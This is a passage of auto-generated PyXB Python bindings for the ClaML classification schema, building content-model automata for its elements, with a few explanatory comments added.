cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('ClaML.xsd', 32, 16))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 34, 16))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 35, 16))
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 36, 16))
counters.add(cc_7)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 26, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Identifier')), pyxb.utils.utility.Location('ClaML.xsd', 27, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Title')), pyxb.utils.utility.Location('ClaML.xsd', 28, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Authors')), pyxb.utils.utility.Location('ClaML.xsd', 29, 16))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Variants')), pyxb.utils.utility.Location('ClaML.xsd', 30, 16))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ClassKinds')), pyxb.utils.utility.Location('ClaML.xsd', 31, 16))
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'UsageKinds')), pyxb.utils.utility.Location('ClaML.xsd', 32, 16))
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RubricKinds')), pyxb.utils.utility.Location('ClaML.xsd', 33, 16))
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Modifier')), pyxb.utils.utility.Location('ClaML.xsd', 34, 16))
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ModifierClass')), pyxb.utils.utility.Location('ClaML.xsd', 35, 16))
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Class')), pyxb.utils.utility.Location('ClaML.xsd', 36, 16))
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
transitions.append(fac.Transition(st_5, [
]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
]))
transitions.append(fac.Transition(st_7, [
]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
]))
transitions.append(fac.Transition(st_9, [
]))
transitions.append(fac.Transition(st_10, [
]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_5, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, True) ]))
st_10._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON._Automaton = _BuildAutomaton()
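
# Editorial note: read from the states and transitions above, this automaton
# enforces the child sequence
#   Meta*, Identifier*, Title, Authors?, Variants?, ClassKinds, UsageKinds?,
#   RubricKinds, Modifier*, ModifierClass*, Class*
# for the ClaML document element, with acceptance possible only once
# RubricKinds has been seen.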
CTD_ANON_._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Variant'), CTD_ANON_2, scope=CTD_ANON_, location=pyxb.utils.utility.Location('ClaML.xsd', 48, 4)))
def _BuildAutomaton_ ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_
del _BuildAutomaton_
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Variant')), pyxb.utils.utility.Location('ClaML.xsd', 44, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_._Automaton = _BuildAutomaton_()
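
# Editorial note: several of the builders below return automata with no
# states (e.g. for CTD_ANON_2 and CTD_ANON_5): those types permit no child
# elements, and the third argument True marks empty content as acceptable.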
def _BuildAutomaton_2 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_2
del _BuildAutomaton_2
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_2._Automaton = _BuildAutomaton_2()
def _BuildAutomaton_3 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_3
del _BuildAutomaton_3
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_3()
CTD_ANON_6._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Author'), CTD_ANON_7, scope=CTD_ANON_6, location=pyxb.utils.utility.Location('ClaML.xsd', 80, 4)))
def _BuildAutomaton_4 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_4
del _BuildAutomaton_4
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 76, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_6._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Author')), pyxb.utils.utility.Location('ClaML.xsd', 76, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_6._Automaton = _BuildAutomaton_4()
def _BuildAutomaton_5 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_5
del _BuildAutomaton_5
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_7._Automaton = _BuildAutomaton_5()
CTD_ANON_8._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ClassKind'), CTD_ANON_11, scope=CTD_ANON_8, location=pyxb.utils.utility.Location('ClaML.xsd', 106, 4)))
def _BuildAutomaton_6 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_6
del _BuildAutomaton_6
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_8._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ClassKind')), pyxb.utils.utility.Location('ClaML.xsd', 88, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_8._Automaton = _BuildAutomaton_6()
CTD_ANON_9._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'RubricKind'), CTD_ANON_38, scope=CTD_ANON_9, location=pyxb.utils.utility.Location('ClaML.xsd', 114, 4)))
def _BuildAutomaton_7 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_7
del _BuildAutomaton_7
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_9._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'RubricKind')), pyxb.utils.utility.Location('ClaML.xsd', 95, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_9._Automaton = _BuildAutomaton_7()
CTD_ANON_10._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'UsageKind'), CTD_ANON_12, scope=CTD_ANON_10, location=pyxb.utils.utility.Location('ClaML.xsd', 130, 4)))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_10._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'UsageKind')), pyxb.utils.utility.Location('ClaML.xsd', 102, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_10._Automaton = _BuildAutomaton_8()
CTD_ANON_11._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Display'), CTD_ANON_13, scope=CTD_ANON_11, location=pyxb.utils.utility.Location('ClaML.xsd', 136, 4)))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 109, 16))
counters.add(cc_0)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_11._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Display')), pyxb.utils.utility.Location('ClaML.xsd', 109, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_11._Automaton = _BuildAutomaton_9()
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
states = []
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_13._Automaton = _BuildAutomaton_10()
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_14._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_14, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_11 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_11
del _BuildAutomaton_11
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 145, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 146, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 147, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 148, 16))
counters.add(cc_3)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 145, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 146, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 147, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_14._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 148, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
st_3._set_transitionSet(transitions)
return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_14._Automaton = _BuildAutomaton_11()
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4)))
CTD_ANON_15._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_15, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_12 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_12
del _BuildAutomaton_12
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 157, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 159, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 160, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 161, 16))
counters.add(cc_3)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 157, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SuperClass')), pyxb.utils.utility.Location('ClaML.xsd', 158, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 159, 16))
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 160, 16))
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_15._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 161, 16))
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
]))
transitions.append(fac.Transition(st_3, [
]))
transitions.append(fac.Transition(st_4, [
]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, True) ]))
st_4._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
CTD_ANON_15._Automaton = _BuildAutomaton_12()
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Meta'), CTD_ANON_3, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 53, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy'), CTD_ANON_39, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 186, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier'), CTD_ANON_17, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 205, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Rubric'), CTD_ANON_19, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 217, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'History'), CTD_ANON_21, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 236, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SuperClass'), CTD_ANON_22, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 242, 4)))
CTD_ANON_16._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'SubClass'), CTD_ANON_23, scope=CTD_ANON_16, location=pyxb.utils.utility.Location('ClaML.xsd', 248, 4)))
def _BuildAutomaton_13 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_13
del _BuildAutomaton_13
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 172, 16))
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 173, 16))
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 174, 16))
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 175, 16))
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 176, 16))
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 177, 16))
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('ClaML.xsd', 178, 16))
counters.add(cc_6)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Meta')), pyxb.utils.utility.Location('ClaML.xsd', 172, 16))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SuperClass')), pyxb.utils.utility.Location('ClaML.xsd', 173, 16))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'SubClass')), pyxb.utils.utility.Location('ClaML.xsd', 174, 16))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ModifiedBy')), pyxb.utils.utility.Location('ClaML.xsd', 175, 16))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ExcludeModifier')), pyxb.utils.utility.Location('ClaML.xsd', 176, 16))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Rubric')), pyxb.utils.utility.Location('ClaML.xsd', 177, 16))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(CTD_ANON_16._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'History')), pyxb.utils.utility.Location('ClaML.xsd', 178, 16))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
